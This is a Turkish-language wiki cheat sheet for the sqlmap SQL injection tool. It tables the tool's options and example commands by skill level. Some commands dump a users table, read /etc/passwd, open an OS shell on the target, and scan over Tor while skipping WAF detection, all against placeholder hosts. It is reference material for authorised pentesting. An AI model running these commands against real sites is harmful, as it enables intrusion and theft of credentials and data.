Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.6
Creation-Date: 2025-11-21T21:27:02+03:00

====== sqlmap ======
Created Friday 21 November 2025
---

## Genel Parametreler / Opsiyonlar

| Parametre        | Kısa Açıklama                                                      | Tür                          | Zorunlu mu?                                                                                                                            | Varsayılan / Varsayılan Davranış                           |
|------------------|--------------------------------------------------------------------|------------------------------|----------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------|
| `-u`, `--url`    | Hedef URL (ör. `http://www.site.com/vuln.php?id=1`)                | Metin (URL)                  | **Koşullu** – Hedef tanımlamak için kullanılan seçeneklerden biridir (`-u`, `-d`, `-l`, `-m`, `-r`, `-g`, `-c`’den en az biri gerekli) | Yok                                                        |
| `--dbs`          | Arka uç DBMS üzerindeki veritabanlarını enumerate (listele) eder   | Bayrak                       | İsteğe bağlı                                                                                                                           | Kapalı (kullanılmazsa veritabanları listelenmez)           |
| `--dbs`          | Arka uç DBMS üzerindeki veritabanlarını enumerate (listele) eder   | Bayrak                       | İsteğe bağlı                                                                                                                           | Kapalı (kullanılmazsa veritabanları listelenmez)           |
| `--wizard`       | Başlangıç seviyesindekiler için basit sihirbaz arayüzü             | Bayrak                       | İsteğe bağlı                                                                                                                           | Kapalı                                                     |
| `--data`         | POST isteği ile gönderilecek veri dizesi (ör. `"id=1&user=admin"`) | Metin                        | İsteğe bağlı                                                                                                                           | Yok                                                        |
| `-p`             | Test edilecek parametre(ler)i açıkça belirtir                      | Metin (parametre adı/adları) | İsteğe bağlı                                                                                                                           | Belirtilmezse sqlmap uygun gördüğü parametreleri test eder |
| `--cookie`       | HTTP Cookie başlık değeri (ör. `PHPSESSID=a8d127e...`)             | Metin                        | İsteğe bağlı                                                                                                                           | Yok                                                        |
| `-A`             | HTTP User-Agent başlık değeri                                      | Metin                        | İsteğe bağlı                                                                                                                           | Araç kendi User-Agent’ını kullanır                         |
| `-D`             | Enumerate / dump edilecek DBMS veritabanı adı                      | Metin                        | İsteğe bağlı                                                                                                                           | Yok                                                        |
| `-T`             | Enumerate / dump edilecek DBMS tablo adı(ları)                     | Metin                        | İsteğe bağlı                                                                                                                           | Yok                                                        |
| `--dump`         | Veritabanı tablosu kayıtlarını döker (dump)                        | Bayrak                       | İsteğe bağlı                                                                                                                           | Kapalı                                                     |
| `--batch`        | Kullanıcıdan input istemeden, varsayılan davranışı kullanır        | Bayrak                       | İsteğe bağlı                                                                                                                           | Kapalı (sorular için etkileşimli mod)                      |
| `-t`             | Tüm HTTP trafiğini metin dosyasına loglar                          | Dosya yolu                   | İsteğe bağlı                                                                                                                           | Yok                                                        |
| `--tables`       | Veritabanı tablolarını enumerate eder                              | Bayrak                       | İsteğe bağlı                                                                                                                           | Kapalı                                                     |
| `--level`        | Uygulanacak test seviyesini belirler (1–5)                         | Sayı                         | İsteğe bağlı                                                                                                                           | `1`                                                        |
| `--risk`         | Uygulanacak testlerin risk seviyesini belirler (1–3)               | Sayı                         | İsteğe bağlı                                                                                                                           | `1`                                                        |
| `--threads`      | Eşzamanlı HTTP(S) isteği sayısı (en fazla iş parçacığı)            | Sayı                         | İsteğe bağlı                                                                                                                           | `1`                                                        |
| `-o`             | Tüm optimizasyon anahtarlarını açar                                | Bayrak                       | İsteğe bağlı                                                                                                                           | Kapalı                                                     |
| `-v`             | Ayrıntı (verbosity) seviyesi: 0–6                                  | Sayı                         | İsteğe bağlı                                                                                                                           | `1`                                                        |
| `-r`             | Hedefi ve isteği bir dosyadan yükler (ham HTTP istek dosyası)      | Dosya yolu                   | **Koşullu** – Hedef tanımlama seçeneklerinden biri olabilir                                                                            | Yok                                                        |
| `-m`             | Metin dosyasından birden fazla hedefi tarar                        | Dosya yolu                   | **Koşullu** – Çoklu hedef taramada kullanılır                                                                                          | Yok                                                        |
| `--eta`          | Çıktı için tahmini bitiş süresini (ETA) gösterir                   | Bayrak                       | İsteğe bağlı                                                                                                                           | Kapalı                                                     |
| `--results-file` | Çoklu hedef modunda kullanılacak CSV sonuç dosyasının yolu         | Dosya yolu                   | İsteğe bağlı (çoklu hedefte anlamlı)                                                                                                   | Yok                                                        |
| `--output-dir`   | Çıktıların kaydedileceği özel dizin yolu                           | Dizin yolu                   | İsteğe bağlı                                                                                                                           | Varsayılan sqlmap çıktı dizini                             |
| `--os-shell`     | Arka uç işletim sistemi için etkileşimli komut satırı kabuğu açar  | Bayrak                       | İsteğe bağlı                                                                                                                           | Kapalı                                                     |
| `--file-read`    | Arka uç DBMS dosya sisteminden bir dosyayı okur                    | Dosya yolu                   | İsteğe bağlı                                                                                                                           | Yok                                                        |
| `--sql-query`    | Belirtilen SQL ifadesini çalıştırır                                | Metin (SQL sorgusu)          | İsteğe bağlı                                                                                                                           | Yok                                                        |
| `--tor`          | Tor anonimlik ağını kullanır                                       | Bayrak                       | İsteğe bağlı                                                                                                                           | Kapalı                                                     |
| `--tor-port`     | Tor proxy portunu varsayılan haricinde belirler                    | Sayı                         | İsteğe bağlı                                                                                                                           | Varsayılan Tor portu kullanılır                            |
| `--tor-type`     | Tor proxy türünü ayarlar (`HTTP`, `SOCKS4` veya `SOCKS5`)          | Metin (seçimli)              | İsteğe bağlı                                                                                                                           | `SOCKS5`                                                   |
| `--check-tor`    | Tor’un doğru kullanılıp kullanılmadığını kontrol eder              | Bayrak                       | İsteğe bağlı                                                                                                                           | Kapalı                                                     |
| `--random-agent` | Rastgele seçilmiş bir HTTP User-Agent başlığı kullanır             | Bayrak                       | İsteğe bağlı                                                                                                                           | Kapalı                                                     |
| `--skip-waf`     | SQLi/XSS için WAF/IPS korumasının sezgisel tespitini atlar         | Bayrak                       | İsteğe bağlı                                                                                                                           | Kapalı                                                     |

---

## Başlangıç Seviyesi Komutlar

| Komut Başlığı                             | Seviye    | Komut Sözdizimi (Syntax)                                                       | Ne İşe Yaradığı                                                                                                                                           | Opsiyonların Etkileri                                                                                                                                                                      | Kısa Örnek Senaryo                                                                                                                                                                 |
|-------------------------------------------|-----------|--------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| Tek bir URL'de hızlı zafiyet taraması     | Başlangıç | ```bash\npython sqlmap.py -u "<hedef https>"\n```                              | Verilen URL’deki parametrelerde (ör. `id`) varsayılan ayarlarla SQL injection olup olmadığını test eder.                                                  | - `-u`: Test edilecek hedef URL’yi belirtir; sorgu parametresi içermelidir (örn. `?id=1`).<br>- Bu komuta örneğin `-v 2` eklerseniz: Çıktı daha ayrıntılı olur (verbosity seviyesi artar). | Yeni kurduğunuz sqlmap’le, uygulamanızdaki tek bir sayfanın (örneğin ürün detay sayfası) temel olarak zafiyetli olup olmadığını hızlıca kontrol etmek istediğinizde kullanırsınız. |
| Hedefteki tüm veritabanlarını listeleme   | Başlangıç | ```bash\npython sqlmap.py -u "http://www.site.com/product.php?id=1" --dbs\n``` | Hedefte zafiyet tespit edilirse, arka uç DBMS üzerinde yer alan veritabanı isimlerini enumerate eder (listeler).                                          | - `-u`: Hedef URL’yi belirtir.<br>- `--dbs`: Zafiyet bulunduğunda, hedef DBMS üzerindeki veritabanı isimlerinin getirilmesini ister.                                                       | Örneğin bir uygulamada SQL injection bulduktan sonra, hangi veritabanlarının bulunduğunu görmek için bu komutla ilk keşfi yapabilirsiniz.                                          |
| Sihirbaz arayüzü ile etkileşimli kullanım | Başlangıç | ```bash\npython sqlmap.py --wizard\n```                                        | Basit bir sihirbaz arayüzü açar; komut satırı argümanlarını hatırlamak zorunda kalmadan, sorulara yanıt vererek temel bir tarama yapılandırmanızı sağlar. | - `--wizard`: Sqlmap’i, adım adım soru soran basit bir sihirbaz modunda çalıştırır.<br>- Sihirbaz sırasında URL, veritabanı türü vb. temel bilgiler istenir.                               | Sqlmap’i ilk defa kullanıyorsanız ve parametreleri ezberlemeden, etkileşimli olarak basit bir test çalıştırmak istediğinizde uygundur.                                             |

---

## Orta Seviye Komutlar

| Komut Başlığı                                                    | Seviye      | Komut Sözdizimi (Syntax)                                                                                                                                                                     | Ne İşe Yaradığı                                                                                                                                                                | Opsiyonların Etkileri                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       | Kısa Örnek Senaryo                                                                                                                                                                                                                                     |
|------------------------------------------------------------------|-------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| POST form verisi üzerinden belirli parametreyi test etme         | Orta Seviye | ```bash\npython sqlmap.py -u "http://www.site.com/login.php" \\\n  --data="username=admin&password=1234" \\\n  -p "username" \\\n  --cookie="PHPSESSID=abcd1234" \\\n  -A "Mozilla/5.0"\n``` | Bir login formu gibi POST isteği kullanan bir endpoint’te, özellikle `username` parametresini SQL injection açısından test eder; isteğe özel cookie ve User-Agent ile çalışır. | - `-u`: POST isteğinin gönderileceği hedef URL’yi belirtir.<br>- `--data`: Gönderilecek POST gövdesini tanımlar (ör. kullanıcı adı ve parola).<br>- `-p`: Yalnızca `username` parametresinin test edilmesini sağlar.<br>- `--cookie`: Oturum bilgisi gibi cookie değerlerini HTTP isteğine ekler.<br>- `-A`: Belirli bir User-Agent değeri (ör. tarayıcı benzeri) ile istekte bulunur.                                                                                                                      | Kimlik doğrulama gerektiren bir sayfada (login formu) özellikle kullanıcı adı alanının SQL injection’a açık olup olmadığını, gerçekçi bir oturum çerezi ve User-Agent ile test etmek için kullanabilirsiniz.                                           |
| Belirli veritabanı ve tablodan kayıt dökümü almak                | Orta Seviye | ```bash\npython sqlmap.py -u "http://www.site.com/product.php?id=1" \\\n  -D "shopdb" -T "users" --dump --batch -t "traffic.log"\n```                                                        | `shopdb` veritabanındaki `users` tablosuna erişilebiliyorsa, bu tablodaki satırları döker (dump eder); tüm HTTP trafiğini dosyaya kaydeder ve etkileşim istemeden çalışır.     | - `-u`: Zafiyetin bulunduğu URL’yi belirtir.<br>- `-D`: Hangi veritabanı üzerinde işlem yapılacağını belirtir (`shopdb`).<br>- `-T`: Hangi tablo(lar)ın hedefleneceğini belirtir (`users`).<br>- `--dump`: Seçilen tablo(lar)daki kayıtların çekilmesini ister.<br>- `--batch`: Tüm soruları varsayılan yanıtlarla geçerek kullanıcı etkileşimini kapatır.<br>- `-t`: Tüm HTTP trafiğini `traffic.log` dosyasına kaydeder.                                                                                  | Örneğin bir pentest’te, zafiyetli olduğu doğrulanan bir parametre üzerinden, sadece belirli bir veritabanındaki `users` tablosunu dışarı aktarmak ve eşzamanlı olarak bütün HTTP trafiğini inceleme amacıyla loglamak istediğinizde kullanabilirsiniz. |
| Daha derin testler ve çoklu iş parçacığı ile tabloları listeleme | Orta Seviye | ```bash\npython sqlmap.py -u "http://www.site.com/product.php?id=1" \\\n  --tables -D "shopdb" \\\n  --level=3 --risk=2 \\\n  --threads=5 -o -v 2\n```                                       | `shopdb` veritabanındaki tabloları daha kapsamlı testler (`level` ve `risk` artırılmış) ve birden fazla eşzamanlı istek kullanarak enumerate eder.                             | - `-u`: Hedef URL’yi tanımlar.<br>- `--tables`: Belirtilen veritabanındaki tabloların listelenmesini sağlar.<br>- `-D`: Hangi veritabanının tablolarının enumerate edileceğini belirtir (`shopdb`).<br>- `--level=3`: Uygulanacak test seviyesini 3’e çıkarır (1–5 arası).<br>- `--risk=2`: Testlerin risk seviyesini 2 yapar (1–3 arası).<br>- `--threads=5`: Aynı anda en fazla 5 HTTP isteği kullanır.<br>- `-o`: Tüm optimizasyon anahtarlarını açar.<br>- `-v 2`: Çıktıyı daha ayrıntılı hale getirir. | Orta büyüklükte bir uygulamada, tek bir parametreyi değil tüm tablo keşfini biraz daha agresif ve hızlı şekilde yapmak istediğinizde kullanılır.                                                                                                       |
| Ham HTTP istek dosyası ile hedefi test etme                      | Orta Seviye | ```bash\npython sqlmap.py -r "request.txt" --dbs --batch\n```                                                                                                                                | Önceden kaydedilmiş bir ham HTTP isteğini (`request.txt`) kullanarak aynı isteği sqlmap’e uygular ve veritabanlarını enumerate eder; kullanıcı etkileşimi istemez.             | - `-r`: Tam HTTP isteğini (başlıklar, cookie, gövde vb.) bir dosyadan yükler.<br>- `--dbs`: Hedefteki veritabanı isimlerinin alınmasını ister.<br>- `--batch`: Soru sormadan varsayılan seçeneklerle devam eder.                                                                                                                                                                                                                                                                                            | Burp Suite, proxy vb. aracıyla yakaladığınız karmaşık bir isteği (örn. çok sayıda header, token vb. içeren) sqlmap’e ham olarak verip, aynı koşullar altında test etmek istediğinizde bu komutu kullanabilirsiniz.                                     |

---

## İleri Seviye Komutlar

| Komut Başlığı                                                         | Seviye       | Komut Sözdizimi (Syntax)                                                                                                                                                       | Ne İşe Yaradığı                                                                                                                                                                 | Opsiyonların Etkileri                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            | Kısa Örnek Senaryo                                                                                                                                                                                         |
|-----------------------------------------------------------------------|--------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| Hedef listesi dosyasıyla toplu tarama ve sonuçları kaydetme           | İleri Seviye | ```bash\npython sqlmap.py -m "targets.txt" \\\n  --batch --threads=10 --eta \\\n  --results-file="results.csv" \\\n  --output-dir="sqlmap-output"\n```                         | `targets.txt` içindeki birden fazla URL’yi otomatik ve paralel olarak tarar; etkileşimsiz çalışır, sonuçları CSV dosyasına yazar ve çıktıları belirtilen dizine kaydeder.       | - `-m`: Her satırında hedef URL bulunan bir dosyadan çoklu hedefleri okur.<br>- `--batch`: Tüm hedeflerde kullanıcıdan onay istemeden varsayılan yanıtları kullanır.<br>- `--threads=10`: Aynı anda 10’a kadar HTTP isteği ile çalışır (performansı artırır).<br>- `--eta`: Her çıktı için tahmini bitiş süresini gösterir.<br>- `--results-file`: Çoklu hedef modu için sonuçların CSV formatında kaydedileceği dosya yolunu belirtir (`results.csv`).<br>- `--output-dir`: sqlmap çıktı klasörünü özelleştirir (`sqlmap-output`).              | Kurumsal bir uygulamada ya da zafiyet taraması sırasında, onlarca/hundreds URL içeren bir listeyi gece boyunca otomatik tarayıp, sabah sonuçları tek bir CSV dosyasında incelemek için kullanılır.         |
| Hedef sunucuda komut satırı (OS shell) açma                           | İleri Seviye | ```bash\npython sqlmap.py -u "http://www.site.com/product.php?id=1" \\\n  --os-shell --batch\n```                                                                              | Arka uç DBMS üzerinden, alttaki işletim sistemine komut gönderebileceğiniz etkileşimli bir kabuk açmaya çalışır; kullanıcı etkileşimi sorularını otomatik kabul eder.           | - `-u`: Zafiyetin bulunduğu URL’yi tanımlar.<br>- `--os-shell`: Arka uç işletim sistemi için etkileşimli bir komut satırı (shell) istemi açmaya çalışır.<br>- `--batch`: Bu süreçte çıkabilecek sorulara varsayılan cevaplarla devam eder.                                                                                                                                                                                                                                                                                                       | Yetkili sızma testi kapsamında, DBMS’in süreç kullanıcısının işletim sistemi seviyesinde hangi yetkilere sahip olduğunu anlamak ve komut yürütme imkânlarını test etmek için kullanılabilir.               |
| Arka uç dosya sisteminden dosya okuma                                 | İleri Seviye | ```bash\npython sqlmap.py -u "http://www.site.com/product.php?id=1" \\\n  --file-read="/etc/passwd" --batch\n```                                                               | Arka uç DBMS’in erişebildiği dosya sisteminden belirtilen yolu (`/etc/passwd` vb.) okumaya çalışır ve içeriği çıktı olarak gösterir.                                            | - `-u`: Hedef URL’yi belirtir.<br>- `--file-read`: Arka uç dosya sisteminden okunmasını istediğiniz dosyanın mutlak yolunu tanımlar.<br>- `--batch`: Tüm soruları otomatik yanıtlar.                                                                                                                                                                                                                                                                                                                                                             | Yetkili testlerde, belirli konfigürasyon dosyalarına veya sisteme ait bilgilere (örn. `web.config`, `config.php`) DBMS üzerinden erişilebildiğini doğrulamak için kullanılır.                              |
| Özel bir SQL sorgusu çalıştırma                                       | İleri Seviye | ```bash\npython sqlmap.py -u "http://www.site.com/product.php?id=1" \\\n  --sql-query="SELECT user, password FROM users LIMIT 5"\n```                                          | Zafiyet üzerinden doğrudan belirtilen SQL ifadesini çalıştırır ve sorgunun sonucunu getirir.                                                                                    | - `-u`: Zafiyetli olduğu değerlendirilen URL’yi tanımlar.<br>- `--sql-query`: Çalıştırılmasını istediğiniz SQL ifadesini verir; sqlmap bu sorgunun sonucunu elde etmeye çalışır.                                                                                                                                                                                                                                                                                                                                                                 | Örneğin, daha önce keşfedilen `users` tablosundan yalnızca belirli alanları veya sayıda kaydı çekmek istediğinizde, doğrudan kendi SQL ifadenizi kullanarak hedefli veri sorgulaması yapabilirsiniz.       |
| Tor ve rastgele User-Agent ile anonim ve WAF algılama atlamalı tarama | İleri Seviye | ```bash\npython sqlmap.py -u "http://www.site.com/product.php?id=1" \\\n  --dbs \\\n  --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor \\\n  --random-agent --skip-waf\n``` | Hedef URL’deki zafiyetleri Tor ağı üzerinden, rastgele User-Agent kullanarak ve WAF/IPS sezgisel tespitini atlayarak test eder; veritabanı isimlerini enumerate etmeye çalışır. | - `-u`: Hedef URL’yi belirtir.<br>- `--dbs`: Hedefte veritabanı isimlerini enumerate etmeye çalışır.<br>- `--tor`: Tüm trafiği Tor anonimlik ağı üzerinden göndermeye çalışır.<br>- `--tor-type=SOCKS5`: Tor proxy türünü SOCKS5 olarak ayarlar.<br>- `--tor-port=9050`: Tor proxy portunu 9050 olarak ayarlar.<br>- `--check-tor`: Tor’un doğru kullanılıp kullanılmadığını kontrol eder.<br>- `--random-agent`: Rastgele seçilmiş HTTP User-Agent değeri kullanır.<br>- `--skip-waf`: WAF/IPS korumasının sezgisel tespit mekanizmasını atlar. | Gelişmiş bir sızma testinde, isteklerin Tor üzerinden ve farklı User-Agent’larla gönderilmesini, ayrıca olası WAF/IPS tespitine yönelik sezgisel kontrollerin atlanmasını istediğinizde kullanabilirsiniz. |

Bu tabloları, kendi senaryolarınıza uyarlarken yalnızca **yetkili** olduğunuz sistemlerde deneme yaptığınızdan emin olun.
